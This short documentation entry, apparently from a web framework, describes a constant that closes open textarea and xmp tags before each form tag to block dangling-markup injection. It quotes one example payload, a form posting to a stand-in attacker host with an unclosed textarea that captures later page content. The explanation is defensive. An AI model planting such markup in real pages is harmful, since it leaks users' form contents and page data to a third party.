constant CLOSE_CDATA_COMMENT

Close any open tags that support CDATA (textarea, xmp) before each form tag. This prevents attackers from injecting unclosed tags that could capture form contents.

For example, an attacker might inject:

<form action="https://attacker.com"><textarea>

The HTML following this tag, up until the next </textarea> or the end of the document would be captured by the attacker’s <textarea>. By closing any open textarea tags, we ensure that form contents are never exfiltrated.